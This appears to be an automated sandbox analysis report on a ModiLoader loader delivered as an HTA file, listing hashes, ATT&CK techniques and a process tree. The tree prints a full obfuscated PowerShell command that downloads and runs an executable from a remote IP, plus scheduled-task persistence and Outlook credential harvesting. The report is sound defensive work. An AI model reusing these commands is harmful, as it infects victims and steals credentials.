modiloader | 5774db473258bf744264a3a02e01931fa02ecd19a26f0f9329bfa5ac89d08512

Analysis

max time kernel
148s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
01/04/2025, 15:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

creatingbestthingsforbetterfuture.hta
Size

13KB
MD5

d784a93b62ff236f0090d49eee225f61
SHA1

18545dbd755b169d693a42c7e0ab32f4fd81aeaf
SHA256

5774db473258bf744264a3a02e01931fa02ecd19a26f0f9329bfa5ac89d08512
SHA512

3ca6164390caddbfe14bb3b50e690c08bd5e4df827b4a24e642b759c63cb375cf54ed9f3c9e9bd76c13075f149637034cee64039c9230bc100ba3016c42e73f0
SSDEEP

48:3StrVotriVRy1K+rUmn514Szy6oFAConovTboMrt2tgVJtSPG:AgrYmN514SyJF1onovTbDEGS+

Score

10^/10

modiloader collection defense_evasion discovery execution trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

ModiLoader Second Stage 61 IoCs

resource	yara_rule
behavioral1/memory/5412-79-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-82-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-90-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-100-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-117-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-142-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-140-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-138-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-137-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-136-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-135-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-134-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-133-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-132-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-130-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-128-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-126-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-125-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-123-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-121-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-120-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-116-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-139-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-113-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-112-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-111-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-110-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-109-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-108-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-107-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-131-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-129-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-106-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-105-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-127-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-104-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-103-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-124-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-122-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-102-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-101-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-119-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-118-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-99-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-115-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-98-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-114-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-97-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-96-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-95-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-94-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-93-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-92-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-83-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-91-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-89-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-88-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-87-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-86-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-84-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2
behavioral1/memory/5412-85-0x0000000002910000-0x0000000003910000-memory.dmp	modiloader_stage2

Blocklisted process makes network request 1 IoCs

flow	pid	Process
23	5912	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
23	5912	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
5472	cmd.exe
5912	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	rundll32.exe

Executes dropped EXE 5 IoCs

pid	Process
5412	sihost.exe
4172	alpha.pif
5788	alpha.pif
4040	Djauszke.PIF
1884	Djauszke.PIF

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	recover.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 5412 set thread context of 4060	5412	sihost.exe	121
PID 5412 set thread context of 4412	5412	sihost.exe	122
PID 5412 set thread context of 3324	5412	sihost.exe	123

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
5328	4040	WerFault.exe	116
4704	1884	WerFault.exe	133

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alpha.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	recover.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alpha.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Djauszke.PIF
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sihost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Djauszke.PIF
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	recover.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	recover.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5920	PING.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5920	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
464	schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
5912	powershell.exe
5912	powershell.exe
4060	recover.exe
4060	recover.exe
3324	recover.exe
3324	recover.exe
4060	recover.exe
4060	recover.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
5412	sihost.exe
5412	sihost.exe
5412	sihost.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	5912	powershell.exe
Token: SeDebugPrivilege	3324	recover.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5412	sihost.exe

Suspicious use of WriteProcessMemory 57 IoCs

description	pid	Process	procid_target
PID 1184 wrote to memory of 5472	1184	mshta.exe	87
PID 1184 wrote to memory of 5472	1184	mshta.exe	87
PID 1184 wrote to memory of 5472	1184	mshta.exe	87
PID 5472 wrote to memory of 5912	5472	cmd.exe	90
PID 5472 wrote to memory of 5912	5472	cmd.exe	90
PID 5472 wrote to memory of 5912	5472	cmd.exe	90
PID 5912 wrote to memory of 4904	5912	powershell.exe	96
PID 5912 wrote to memory of 4904	5912	powershell.exe	96
PID 5912 wrote to memory of 4904	5912	powershell.exe	96
PID 4904 wrote to memory of 4308	4904	csc.exe	97
PID 4904 wrote to memory of 4308	4904	csc.exe	97
PID 4904 wrote to memory of 4308	4904	csc.exe	97
PID 5912 wrote to memory of 5412	5912	powershell.exe	101
PID 5912 wrote to memory of 5412	5912	powershell.exe	101
PID 5912 wrote to memory of 5412	5912	powershell.exe	101
PID 5412 wrote to memory of 5200	5412	sihost.exe	102
PID 5412 wrote to memory of 5200	5412	sihost.exe	102
PID 5412 wrote to memory of 5200	5412	sihost.exe	102
PID 5412 wrote to memory of 3452	5412	sihost.exe	103
PID 5412 wrote to memory of 3452	5412	sihost.exe	103
PID 5412 wrote to memory of 3452	5412	sihost.exe	103
PID 5200 wrote to memory of 4256	5200	cmd.exe	106
PID 5200 wrote to memory of 4256	5200	cmd.exe	106
PID 5200 wrote to memory of 4256	5200	cmd.exe	106
PID 3452 wrote to memory of 5920	3452	cmd.exe	107
PID 3452 wrote to memory of 5920	3452	cmd.exe	107
PID 3452 wrote to memory of 5920	3452	cmd.exe	107
PID 5200 wrote to memory of 4172	5200	cmd.exe	108
PID 5200 wrote to memory of 4172	5200	cmd.exe	108
PID 5200 wrote to memory of 4172	5200	cmd.exe	108
PID 5200 wrote to memory of 5788	5200	cmd.exe	109
PID 5200 wrote to memory of 5788	5200	cmd.exe	109
PID 5200 wrote to memory of 5788	5200	cmd.exe	109
PID 5412 wrote to memory of 4336	5412	sihost.exe	110
PID 5412 wrote to memory of 4336	5412	sihost.exe	110
PID 5412 wrote to memory of 4336	5412	sihost.exe	110
PID 4336 wrote to memory of 464	4336	cmd.exe	113
PID 4336 wrote to memory of 464	4336	cmd.exe	113
PID 4336 wrote to memory of 464	4336	cmd.exe	113
PID 1292 wrote to memory of 4040	1292	rundll32.exe	116
PID 1292 wrote to memory of 4040	1292	rundll32.exe	116
PID 1292 wrote to memory of 4040	1292	rundll32.exe	116
PID 5412 wrote to memory of 4060	5412	sihost.exe	121
PID 5412 wrote to memory of 4060	5412	sihost.exe	121
PID 5412 wrote to memory of 4060	5412	sihost.exe	121
PID 5412 wrote to memory of 4060	5412	sihost.exe	121
PID 5412 wrote to memory of 4412	5412	sihost.exe	122
PID 5412 wrote to memory of 4412	5412	sihost.exe	122
PID 5412 wrote to memory of 4412	5412	sihost.exe	122
PID 5412 wrote to memory of 4412	5412	sihost.exe	122
PID 5412 wrote to memory of 3324	5412	sihost.exe	123
PID 5412 wrote to memory of 3324	5412	sihost.exe	123
PID 5412 wrote to memory of 3324	5412	sihost.exe	123
PID 5412 wrote to memory of 3324	5412	sihost.exe	123
PID 5980 wrote to memory of 1884	5980	rundll32.exe	133
PID 5980 wrote to memory of 1884	5980	rundll32.exe	133
PID 5980 wrote to memory of 1884	5980	rundll32.exe	133

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatingbestthingsforbetterfuture.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1184
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C poWershell.exe -eX ByPASs -NONi -w 1 -C DeVIcecredentialDePLOYMeNt ; Iex($(iEX('[sYSTem.teXt.ENcoDinG]'+[CHAr]0x3a+[chAR]0x3a+'uTF8.gETStRInG([systeM.cOnvert]'+[CHAR]58+[ChAR]0X3a+'frOMBaSE64STRiNg('+[CHAr]0X22+'JHNSTjd5MEwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQkVSZGVGaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqa2JvZFpGVm1CLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6ZE5FTlRESCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjR2EsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEF4a3RXTyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiR0VNaXhyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZVNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNUbmV5WlllQ1RpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHNSTjd5MEw6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE5MS44OC85MC9zaWhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXHNpaG9zdC5leGUiLDAsMCk7U1RBclQtU0xFZXAoMyk7aW5WT2tFLUl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzaWhvc3QuZXhlIg=='+[ChAR]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5472
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poWershell.exe -eX ByPASs -NONi -w 1 -C DeVIcecredentialDePLOYMeNt ; Iex($(iEX('[sYSTem.teXt.ENcoDinG]'+[CHAr]0x3a+[chAR]0x3a+'uTF8.gETStRInG([systeM.cOnvert]'+[CHAR]58+[ChAR]0X3a+'frOMBaSE64STRiNg('+[CHAr]0X22+'JHNSTjd5MEwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQkVSZGVGaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqa2JvZFpGVm1CLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6ZE5FTlRESCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjR2EsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEF4a3RXTyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiR0VNaXhyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZVNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNUbmV5WlllQ1RpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHNSTjd5MEw6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE5MS44OC85MC9zaWhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXHNpaG9zdC5leGUiLDAsMCk7U1RBclQtU0xFZXAoMyk7aW5WT2tFLUl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzaWhvc3QuZXhlIg=='+[ChAR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Downloads MZ/PE file
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5912
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aw5cq0fe\aw5cq0fe.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4904
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES70BB.tmp" "c:\Users\Admin\AppData\Local\Temp\aw5cq0fe\CSCAEF37203D2584819B593FBAC3246696.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4308
  - - C:\Users\Admin\AppData\Roaming\sihost.exe
      "C:\Users\Admin\AppData\Roaming\sihost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:5412
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\\ProgramData\\1859.cmd
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5200
      - C:\Windows\SysWOW64\esentutl.exe
        
        C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
        6⤵
        
        PID:4256
      - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4172
      - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5788
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\\ProgramData\\39457.cmd
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3452
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 10
        6⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5920
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\\ProgramData\\81.cmd
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4336
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "Djauszke" /tr C:\\ProgramData\\Djauszke.url"
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:464
    - - C:\Windows\SysWOW64\recover.exe
        
        C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\iskdvgtuccshfbzowzmcgqormolsaptsve"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4060
    - - C:\Windows\SysWOW64\recover.exe
        
        C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\smqwwz"
        5⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:4412
    - - C:\Windows\SysWOW64\recover.exe
        
        C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\uovgxropdt"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3324

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Windows\System32\ieframe.dll",OpenURL C:\\ProgramData\\Djauszke.url
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1292
- C:\Users\Admin\Links\Djauszke.PIF
  "C:\Users\Admin\Links\Djauszke.PIF"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4040
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 1276
    3⤵
    - Program crash
    PID:5328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4040 -ip 4040
1⤵
PID:5072

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Windows\System32\ieframe.dll",OpenURL C:\\ProgramData\\Djauszke.url
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5980
- C:\Users\Admin\Links\Djauszke.PIF
  "C:\Users\Admin\Links\Djauszke.PIF"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1884
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1884 -s 1112
    3⤵
    - Program crash
    PID:4704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 1884 -ip 1884
1⤵
PID:1284

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\1859.cmd

Filesize
19KB

MD5
1df650cca01129127d30063634ab5c03

SHA1
bc7172dec0b12b05f2247bd5e17751eb33474d4e

SHA256
edd4094e7a82a6ff8be65d6b075e9513bd15a6b74f8032b5c10ce18f7191fa60

SHA512
0bddf9ecaaedb0c30103a1fbfb644d6d4f7608bd596403307ed89b2390568c3a29e2cf55d10e2eadbfc407ede52eaf9a4f2321ba5f37e358a1039f73c7688fbd

Download Submit
C:\ProgramData\39457.cmd

Filesize
2KB

MD5
9a020804eba1ffac2928d7c795144bbf

SHA1
61fdc4135afdc99e106912aeafeac9c8a967becc

SHA256
a86c6c7a2bf9e12c45275a5e7ebebd5e6d2ba302fe0a12600b7c9fdf283d9e63

SHA512
42f6d754f1bdbeb6e4cc7aeb57ff4c4d126944f950d260a0839911e576ad16002c16122f81c1d39fa529432dca0a48c9acfbb18804ca9044425c8e424a5518be

Download Submit
C:\ProgramData\81.cmd

Filesize
83B

MD5
40dcdc4a568ca38fd76ed517d58895dd

SHA1
a61427cc65116b4f452c75d8270d5316aa52087f

SHA256
5337e647cbe97c1108b0c690bccf5327291051fd0b80a7c51a8f06ca4c32b987

SHA512
2e32e0bec4ec95af7f1d5fa7a26e69d00a0d50afedeefeb50a809eb52a44d9c00036ccaaf47773035e21925fcc0425a3726d5676013189d0845a31c93dfa0cb1

Download Submit
C:\ProgramData\Djauszke.url

Filesize
99B

MD5
a5912988334a6c35fe2ec953f58ce524

SHA1
6948136050973d827eed0327e58fc134d669a081

SHA256
fe37e36e0ead8740d562edcab4c2157d530feb3bc736743421d77706552fdf0f

SHA512
b569029ae32c7276d4a8e6ca055c40132858ddd5607f3d61fd695253d93a6fb13275f9308a24e9c9dbf09ad2ea386e426089f36e0127b21fd9c6b14a7825d480

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
102B

MD5
5dc76b14f6c80491954c744e47119360

SHA1
9fd1e95bc06a9f19a1ad9fcb5f8fa272c8013e66

SHA256
58397582ee17680b2f4d10f5c8245c8e36f99deb0a11c17b1359d02093cc7550

SHA512
10d27351c6cb77ec93f96ecaeadfea2b3341cfdc5e6904a5e86e69f2d1dbb9753ba994e5dfab0001b2de396e44e27961b698c43306f01ad5fc8fe67463467f5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES70BB.tmp

Filesize
1KB

MD5
07e3511f495b713d432dd83ff5967816

SHA1
5c24755ed85cc5ce62802eaa39aa719d79d4c05a

SHA256
5ca722b31603f9d7ead841cee06339f4678274d04c8c548a81e234cfc33f6226

SHA512
3b0c16bdef3bbfb5fe05ab10683dded6b60fbc9d5569ca4e5e07102fb2ffc17a36b1d229eee306e5b3a58d5c98526987a8bef992f8a708744cee0b6ae2b2b245

Download Submit
